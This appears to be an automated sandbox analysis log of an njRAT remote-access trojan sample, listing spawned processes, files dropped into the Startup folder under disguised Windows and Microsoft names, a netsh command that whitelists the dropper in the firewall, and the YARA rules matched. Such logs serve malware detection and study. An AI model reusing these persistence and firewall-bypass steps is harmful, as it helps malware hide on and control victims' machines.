          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29406 NtLoadKey,14_2_00A29406
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29442 NtNotifyChangeKey,14_2_00A29442
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A295A4 NtWriteFile,14_2_00A295A4
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29586 NtTerminateProcess,14_2_00A29586
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A295FC NtQueryObject,14_2_00A295FC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29522 NtSaveKey,14_2_00A29522
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29502 NtRestoreKey,14_2_00A29502
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A2957E NtUnloadKey,14_2_00A2957E
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29540 NtSetInformationKey,14_2_00A29540
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A28EA8 NtCreateThread,14_2_00A28EA8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29698 NtQueryDirectoryFileEx,14_2_00A29698
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29630 NtQueryDirectoryFile,14_2_00A29630
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A297A6 NtDeleteFile,14_2_00A297A6
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A297AE NtLockFile,14_2_00A297AE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A28FBC NtCreateUserProcess,14_2_00A28FBC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A28F0B NtResumeThread,14_2_00A28F0B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A2970C NtOpenSection,14_2_00A2970C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29716 NtDuplicateObject,14_2_00A29716
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A28F14 NtCreateProcess,14_2_00A28F14
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29760 NtQueryVolumeInformationFile,14_2_00A29760
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A28F64 NtCreateProcessEx,14_2_00A28F64
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Windows\SysWOW64\Explower.exeJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_036242980_2_03624298
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_036242870_2_03624287
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 1_2_00AE60761_2_00AE6076
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 1_2_00AE6D001_2_00AE6D00
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD42904_2_02FD4290
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD427F4_2_02FD427F
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD46284_2_02FD4628
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD4FF84_2_02FD4FF8
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD47CC4_2_02FD47CC
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD4F954_2_02FD4F95
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD53674_2_02FD5367
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD4B534_2_02FD4B53
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD4F274_2_02FD4F27
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD47074_2_02FD4707
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD44E94_2_02FD44E9
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD50DB4_2_02FD50DB
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD4C874_2_02FD4C87
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD50554_2_02FD5055
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD54514_2_02FD5451
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD49F14_2_02FD49F1
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD49954_2_02FD4995
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD453C4_2_02FD453C
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_02FD492E4_2_02FD492E
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 15_2_00A3607615_2_00A36076
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 15_2_00A36D0015_2_00A36D00
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeCode function: 21_2_0098700021_2_00987000
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeCode function: 21_2_0099003A21_2_0099003A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeCode function: 21_2_0098A84421_2_0098A844
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeCode function: 21_2_0098F06621_2_0098F066
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeCode function: 21_2_009951D021_2_009951D0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeCode function: 21_2_0098E11221_2_0098E112
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeCode function: 21_2_00989BD021_2_00989BD0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeCode function: 21_2_00988B2221_2_00988B22
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeCode function: 21_2_00988B7421_2_00988B74
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeCode function: 21_2_00988D9621_2_00988D96
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeCode function: 21_2_009955CA21_2_009955CA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeCode function: 21_2_0098AE8021_2_0098AE80
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeCode function: 21_2_00988F9421_2_00988F94
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 22_2_0051607622_2_00516076
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 22_2_00516D0022_2_00516D00
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: String function: 006202AC appears 51 times
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1608
          Source: MyProg.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2192046352.00000000014F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs LisectAVT_2403002B_366.exe
          Source: LisectAVT_2403002B_366.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
          Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: RRqyIX.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: RRqyIX.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: RRqyIX.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
          Source: classification engineClassification label: mal100.spre.phis.troj.adwa.evad.winEXE@31/45@1/2
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 1_2_00AE119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,1_2_00AE119F
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00D9BC86 AdjustTokenPrivileges,4_2_00D9BC86
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00D9BC4F AdjustTokenPrivileges,4_2_00D9BC4F
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 15_2_00A3119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,15_2_00A3119F
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeCode function: 22_2_0051119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,22_2_0051119F
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeCode function: 0_2_007A0914 GetDiskFreeSpaceExA,0_2_007A0914
          Source: C:\Users\user\AppData\Local\Temp\server.exeFile created: C:\Program Files (x86)\Explower.exeJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeFile created: C:\Users\user\AppData\Roaming\appJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:364:120:WilError_03
          Source: C:\Users\user\AppData\Local\Temp\server.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:120:WilError_03
          Source: C:\Users\user\AppData\Local\Temp\server.exeMutant created: \Sessions\1\BaseNamedObjects\8d9ba8e0d68a3d306883c186c2013957
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4888
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1372:120:WilError_03
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeFile created: C:\Users\user\AppData\Local\Temp\RRqyIX.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" "
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeFile read: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe "C:\Users\user\Desktop\LisectAVT_2403002B_366.exe"
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess created: C:\Users\user\AppData\Local\Temp\server.exe "C:\Users\user\AppData\Local\Temp\server.exe"
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\server.exe" "server.exe" ENABLE
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1608
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe"
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe"
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" "
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe"
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2266597f.bat" "
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exeJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeProcess created: C:\Users\user\AppData\Local\Temp\server.exe "C:\Users\user\AppData\Local\Temp\server.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\server.exe" "server.exe" ENABLEJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeProcess created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" "
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeProcess created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2266597f.bat" "
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: ntvdm64.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: ntvdm64.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
